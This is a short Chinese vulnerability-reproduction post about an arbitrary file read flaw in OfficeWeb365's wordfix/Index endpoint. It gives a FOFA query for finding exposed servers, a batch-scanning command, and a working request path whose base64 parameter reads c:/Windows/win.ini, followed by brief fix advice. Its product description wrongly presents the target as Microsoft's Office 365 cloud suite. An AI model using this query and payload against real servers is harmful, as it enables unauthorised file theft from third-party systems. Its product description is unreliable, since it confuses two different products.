【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

admin 2024年2月29日12:56:48评论50 views字数 574阅读1分54秒阅读模式
 

01产品描述
【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

Office365是微软公司推出的一套云端办公软件服务,集合了Word、Excel、PowerPoint、OneNote等经典办公应用,以及云端的邮件、日程、文件存储与共享等功能。Office 365的核心优势在于其强大的云端协作能力,支持多设备跨平台访问,让用户随时随地都能进行高效的办公操作。此外,Office 365还提供了丰富的模板和在线素材,方便用户快速创建专业的文档和演示;其强大的版本控制功能,可以追踪文件的修改历史,保证团队协作的顺畅进行。同时,Office 365的安全机制也能确保用户数据的安全和隐私。

02FOFA语法
【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

header="officeweb365"
03漏洞复现
python3 main.py -f url.txt -p officeweb365-wordfix-Index-readfile

【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

直接访问以下链接:/wordfix/Index?f=YzovV2luZG93cy93aW4uaW5p  f后的为base64编码

【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

 

04修复建议

1、限制wordfix接口的访问

2、升级officeweb365至最新版本

3、官网下载最新安全补丁:https://www.officeweb365.com

原文始发于微信公众号(SCA御盾):【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月29日12:56:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】officeweb365-wordfix-Index-任意文件读取漏洞复现http://cn-sec.com/archives/2536304.html

发表评论

匿名网友 填写信息